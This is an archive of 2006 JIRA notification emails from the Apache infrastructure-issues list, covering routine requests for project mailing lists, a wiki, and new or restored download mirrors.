(161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 04:22:36 -0000 Received: (qmail 43799 invoked by uid 500); 7 Jun 2006 04:22:33 -0000 Delivered-To: [email protected] Received: (qmail 43443 invoked by uid 500); 7 Jun 2006 04:22:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43428 invoked by uid 99); 7 Jun 2006 04:22:31 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 21:22:31 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 21:22:31 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C272C71429F for <[email protected]>; Wed, 7 Jun 2006 04:21:29 +0000 (GMT) Message-ID: <19100248.1149654089766.JavaMail.jira@brutus> Date: Wed, 7 Jun 2006 04:21:29 +0000 (GMT+00:00) From: "Cliff Schmidt (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-833) Create mailing lists for XAP MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Create mailing lists for XAP ---------------------------- Key: INFRA-833 URL: http://issues.apache.org/jira/browse/INFRA-833 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Mailing Lists Reporter: Cliff Schmidt Please create the following lists and archives under the incubator.apache.org domain: xap-ppmc (moderated subscriptions, private) xap-dev xap-commits xap-user The moderators for all lists should be: [email protected] [email protected] [email protected] Thanks! -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 07 13:45:48 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61035 invoked from network); 7 Jun 2006 13:45:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 13:45:44 -0000 Received: (qmail 57070 invoked by uid 500); 7 Jun 2006 13:45:34 -0000 Delivered-To: [email protected] Received: (qmail 56764 invoked by uid 500); 7 Jun 2006 13:45:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56753 invoked by uid 99); 7 Jun 2006 13:45:32 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 06:45:32 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 06:45:32 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3936971429B for <[email protected]>; Wed, 7 Jun 2006 13:44:30 +0000 (GMT) Message-ID: <9759986.1149687870220.JavaMail.jira@brutus> Date: Wed, 7 Jun 2006 13:44:30 +0000 (GMT+00:00) From: "Joe Schaefer (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-832) create lucy mailing lists In-Reply-To: <25907211.1149614369774.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-832?page=all ] Joe Schaefer closed INFRA-832: ------------------------------ Resolution: Fixed Assign To: Joe Schaefer done > create lucy mailing lists > ------------------------- > > Key: INFRA-832 > URL: http://issues.apache.org/jira/browse/INFRA-832 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Doug Cutting > Assignee: Joe Schaefer > > Can we please get mailing lists created for a new Lucene subproject? > The mailing lists needed are: > [email protected] > [email protected] > [email protected] > The owners should be [email protected] and [email protected]. > Thanks! > Doug -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 07 13:45:50 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61198 invoked from network); 7 Jun 2006 13:45:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 13:45:47 -0000 Received: (qmail 57424 invoked by uid 500); 7 Jun 2006 13:45:38 -0000 Delivered-To: [email protected] Received: (qmail 57160 invoked by uid 500); 7 Jun 2006 13:45:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57135 invoked by uid 99); 7 Jun 2006 13:45:35 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 06:45:35 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 06:45:33 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 8B5127142C8 for <[email protected]>; Wed, 7 Jun 2006 13:44:31 +0000 (GMT) Message-ID: <13618718.1149687871567.JavaMail.jira@brutus> Date: Wed, 7 Jun 2006 13:44:31 +0000 (GMT+00:00) From: "Joe Schaefer (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-833) Create mailing lists for XAP In-Reply-To: <19100248.1149654089766.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-833?page=all ] Joe Schaefer closed INFRA-833: ------------------------------ Resolution: Fixed Assign To: Joe Schaefer done > Create mailing lists for XAP > ---------------------------- > > Key: INFRA-833 > URL: http://issues.apache.org/jira/browse/INFRA-833 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Cliff Schmidt > Assignee: Joe Schaefer > > Please create the following lists and archives under the incubator.apache.org domain: > xap-ppmc (moderated subscriptions, private) > xap-dev > xap-commits > xap-user > The moderators for all lists should be: > [email protected] > [email protected] > [email protected] > Thanks! -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 07 14:57:41 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88508 invoked from network); 7 Jun 2006 14:57:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 14:57:39 -0000 Received: (qmail 22655 invoked by uid 500); 7 Jun 2006 14:57:35 -0000 Delivered-To: [email protected] Received: (qmail 22388 invoked by uid 500); 7 Jun 2006 14:57:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22377 invoked by uid 99); 7 Jun 2006 14:57:34 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 07:57:34 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 07:57:33 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id AE5657142A1 for <[email protected]>; Wed, 7 Jun 2006 14:56:31 +0000 (GMT) Message-ID: <3645843.1149692191710.JavaMail.jira@brutus> Date: Wed, 7 Jun 2006 14:56:31 +0000 (GMT+00:00) From: "Philipp Maske (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-834) Please add new mirror in Germany, Hannover MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Please add new mirror in Germany, Hannover ------------------------------------------ Key: INFRA-834 URL: http://issues.apache.org/jira/browse/INFRA-834 Project: Infrastructure Type: New Feature Security: public (Regular issues) Environment: Debian Sarge 3.1, Dual Xeon 2,8, 100MBit/s Reporter: Philipp Maske URL of mirror: http://apache.mirroring.de Country: Germany, Hannover Contact email: [email protected] Update frequency: 4 times a day Rsync repository used: rsync.eu.apache.org Approx. bandwidth: 100mbit I have configured my HTTP server as requested: yes I have subscribed to the mirror maintainers mailing list: yes URL to 100x34 logo: http://www.mirroring.de/footer/logo_134.jpg Link for image: http://www.mirroring.de Thank you. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 07 14:59:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89782 invoked from network); 7 Jun 2006 14:59:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 14:59:38 -0000 Received: (qmail 24960 invoked by uid 500); 7 Jun 2006 14:59:34 -0000 Delivered-To: [email protected] Received: (qmail 24688 invoked by uid 500); 7 Jun 2006 14:59:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24677 invoked by uid 99); 7 Jun 2006 14:59:33 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 07:59:33 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 07:59:33 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1214371429B for <[email protected]>; Wed, 7 Jun 2006 14:58:31 +0000 (GMT) Message-ID: <9008786.1149692311070.JavaMail.jira@brutus> Date: Wed, 7 Jun 2006 14:58:31 +0000 (GMT+00:00) From: "Philipp Maske (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-835) Please add new mirror in Germany, Hannover MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Please add new mirror in Germany, Hannover ------------------------------------------ Key: INFRA-835 URL: http://issues.apache.org/jira/browse/INFRA-835 Project: Infrastructure Type: Wish Security: public (Regular issues) Components: Mirrors Environment: Dual Xeon 2.8 Debian Sarge 3.1 Reporter: Philipp Maske URL of mirror: http://apache.mirroring.de Country: Germany, Hannover Contact email: [email protected] Update frequency: 4 times a day Rsync repository used: rsync.eu.apache.org Approx. bandwidth: 100mbit I have configured my HTTP server as requested: yes I have subscribed to the mirror maintainers mailing list: yes URL to 100x34 logo: http://www.mirroring.de/footer/logo_134.jpg Link for image: http://www.mirroring.de Thank you. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 07 17:54:36 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61606 invoked from network); 7 Jun 2006 17:54:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 17:54:36 -0000 Received: (qmail 83127 invoked by uid 500); 7 Jun 2006 17:54:34 -0000 Delivered-To: [email protected] Received: (qmail 82820 invoked by uid 500); 7 Jun 2006 17:54:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82796 invoked by uid 99); 7 Jun 2006 17:54:32 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 10:54:32 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 10:54:32 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C2B7B71429B for <[email protected]>; Wed, 7 Jun 2006 17:53:29 +0000 (GMT) Message-ID: <16027003.1149702809767.JavaMail.jira@brutus> Date: Wed, 7 Jun 2006 17:53:29 +0000 (GMT+00:00) From: "Doug Cutting (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-836) new wiki request: lucy MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N new wiki request: lucy ---------------------- Key: INFRA-836 URL: http://issues.apache.org/jira/browse/INFRA-836 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Wiki Reporter: Doug Cutting Can you please create a wiki for "Lucy", a new Lucene sub-project? Thanks! -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 07 22:38:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84107 invoked from network); 7 Jun 2006 22:38:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 22:38:40 -0000 Received: (qmail 46410 invoked by uid 500); 7 Jun 2006 22:38:37 -0000 Delivered-To: [email protected] Received: (qmail 46067 invoked by uid 500); 7 Jun 2006 22:38:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45479 invoked by uid 99); 7 Jun 2006 22:38:34 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 15:38:34 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 15:38:33 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D47697142C8 for <[email protected]>; Wed, 7 Jun 2006 22:37:30 +0000 (GMT) Message-ID: <24850473.1149719850867.JavaMail.jira@brutus> Date: Wed, 7 Jun 2006 22:37:30 +0000 (GMT+00:00) From: "MULTIDIST SARL (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-837) New mirror in FRANCE MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N New mirror in FRANCE -------------------- Key: INFRA-837 URL: http://issues.apache.org/jira/browse/INFRA-837 Project: Infrastructure Type: Improvement Security: public (Regular issues) Components: Mirrors Environment: Apache Reporter: MULTIDIST SARL URL of mirror : apache.multidist.com Country where the mirror is located FRANCE Contact email address [email protected] Update frequency 1per day Rsync repository used rsync -rtlzv --delete rsync.eu.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist /home/mirrors/apache/ Approximate bandwidth 10Mb I have configured my HTTP server as requested (yes/no) yes I have subscribed to the mirror maintainers mailing list (yes/no) no, but how can i do it? Logo http://www.multidist.com/images/multidist.gif -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 07 22:40:41 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85711 invoked from network); 7 Jun 2006 22:40:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 22:40:40 -0000 Received: (qmail 50994 invoked by uid 500); 7 Jun 2006 22:40:35 -0000 Delivered-To: [email protected] Received: (qmail 50667 invoked by uid 500); 7 Jun 2006 22:40:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50656 invoked by uid 99); 7 Jun 2006 22:40:34 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 15:40:34 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 15:40:33 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id F236C71429F for <[email protected]>; Wed, 7 Jun 2006 22:39:30 +0000 (GMT) Message-ID: <29547211.1149719970973.JavaMail.jira@brutus> Date: Wed, 7 Jun 2006 22:39:30 +0000 (GMT+00:00) From: "MULTIDIST SARL (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-837) New mirror in FRANCE In-Reply-To: <24850473.1149719850867.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-837?page=all ] MULTIDIST SARL updated INFRA-837: --------------------------------- Description: URL of mirror : apache.multidist.com Country where the mirror is located FRANCE Contact email address [email protected] Update frequency 1per day Rsync repository used rsync -rtlzv --delete rsync.eu.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist /home/mirrors/apache/ Approximate bandwidth 10Mb I have configured my HTTP server as requested (yes/no) yes I have subscribed to the mirror maintainers mailing list (yes/no) no, but how can i do it? Logo http://www.multidist.com/images/multidist.gif Site : http://www.multidist.com was: URL of mirror : apache.multidist.com Country where the mirror is located FRANCE Contact email address [email protected] Update frequency 1per day Rsync repository used rsync -rtlzv --delete rsync.eu.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist /home/mirrors/apache/ Approximate bandwidth 10Mb I have configured my HTTP server as requested (yes/no) yes I have subscribed to the mirror maintainers mailing list (yes/no) no, but how can i do it? Logo http://www.multidist.com/images/multidist.gif > New mirror in FRANCE > -------------------- > > Key: INFRA-837 > URL: http://issues.apache.org/jira/browse/INFRA-837 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mirrors > Environment: Apache > Reporter: MULTIDIST SARL > > URL of mirror : apache.multidist.com > Country where the mirror is located FRANCE > Contact email address [email protected] > Update frequency 1per day > Rsync repository used rsync -rtlzv --delete rsync.eu.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist /home/mirrors/apache/ > Approximate bandwidth 10Mb > I have configured my HTTP server as requested (yes/no) yes > I have subscribed to the mirror maintainers mailing list (yes/no) no, but how can i do it? > Logo http://www.multidist.com/images/multidist.gif > Site : http://www.multidist.com -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 08 16:35:38 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71043 invoked from network); 8 Jun 2006 16:35:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jun 2006 16:35:37 -0000 Received: (qmail 19023 invoked by uid 500); 8 Jun 2006 16:35:36 -0000 Delivered-To: [email protected] Received: (qmail 18737 invoked by uid 500); 8 Jun 2006 16:35:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18721 invoked by uid 99); 8 Jun 2006 16:35:34 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 09:35:34 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 09:35:33 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 26AE471429B for <[email protected]>; Thu, 8 Jun 2006 16:34:30 +0000 (GMT) Message-ID: <21425222.1149784470129.JavaMail.jira@brutus> Date: Thu, 8 Jun 2006 16:34:30 +0000 (GMT+00:00) From: "Dark (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-838) Restore Apache mirror MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Restore Apache mirror --------------------- Key: INFRA-838 URL: http://issues.apache.org/jira/browse/INFRA-838 Project: Infrastructure Type: Improvement Security: public (Regular issues) Components: HTTP Server Environment: FreeBSD Reporter: Dark URL of mirror: http://apache.intissite.com Country where the mirror is located: USA Contact email address: [email protected] Update frequency: daily at 4:00 Rsync repository used: rsync.apache.org Approximate bandwidth: 100 Mbit I have configured my HTTP server as requested: Yes I have subscribed to the mirror maintainers mailing list: Yes -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 08 19:52:37 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43901 invoked from network); 8 Jun 2006 19:52:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jun 2006 19:52:37 -0000 Received: (qmail 61808 invoked by uid 500); 8 Jun 2006 19:52:35 -0000 Delivered-To: [email protected] Received: (qmail 61533 invoked by uid 500); 8 Jun 2006 19:52:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61522 invoked by uid 99); 8 Jun 2006 19:52:34 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 12:52:34 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 12:52:33 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id BF56C71421B for <[email protected]>; Thu, 8 Jun 2006 19:51:29 +0000 (GMT) Message-ID: <12820429.1149796289765.JavaMail.jira@brutus> Date: Thu, 8 Jun 2006 19:51:29 +0000 (GMT+00:00) From: "Jeremy Boynes (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-839) Private list for Tuscany project MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Private list for Tuscany project -------------------------------- Key: INFRA-839 URL: http://issues.apache.org/jira/browse/INFRA-839 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Mailing Lists Reporter: Jeremy Boynes The Tuscany project does not have a private/ppmc list for discussion of things like new committers. Please can we create a list for that with the archive visible to tuscany committers (ws-tuscany group I believe). The current lists are under ws e.g. [email protected] Please can you create [email protected] or [email protected] as appropriate. Please add jboynes as a moderator for the new list with the ability to add other subscribers. Is it possible to pre-subscribe all Tuscany committers or should they send in subscription requests? -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 08 20:11:48 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49429 invoked from network); 8 Jun 2006 20:11:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jun 2006 20:11:44 -0000 Received: (qmail 84487 invoked by uid 500); 8 Jun 2006 20:11:37 -0000 Delivered-To: [email protected] Received: (qmail 84198 invoked by uid 500); 8 Jun 2006 20:11:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84171 invoked by uid 99); 8 Jun 2006 20:11:35 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 13:11:35 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 13:11:35 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1286B7142CC for <[email protected]>; Thu, 8 Jun 2006 20:10:31 +0000 (GMT) Message-ID: <28245513.1149797431072.JavaMail.jira@brutus> Date: Thu, 8 Jun 2006 20:10:31 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-839) Private list for Tuscany project In-Reply-To: <12820429.1149796289765.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-839?page=comments#action_12415418 ] Joshua Slive commented on INFRA-839: ------------------------------------ I don't follow the incubator too closely, but it seems that if you plan to be part of the web services project, than any such discussions must take place on the web services PMC list. > Private list for Tuscany project > -------------------------------- > > Key: INFRA-839 > URL: http://issues.apache.org/jira/browse/INFRA-839 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Jeremy Boynes > > The Tuscany project does not have a private/ppmc list for discussion of things like new committers. Please can we create a list for that with the archive visible to tuscany committers (ws-tuscany group I believe). > The current lists are under ws e.g. [email protected] > Please can you create > [email protected] > or > [email protected] > as appropriate. > Please add jboynes as a moderator for the new list with the ability to add other subscribers. Is it possible to pre-subscribe all Tuscany committers or should they send in subscription requests? -- This message is automatically generated by JIRA. - 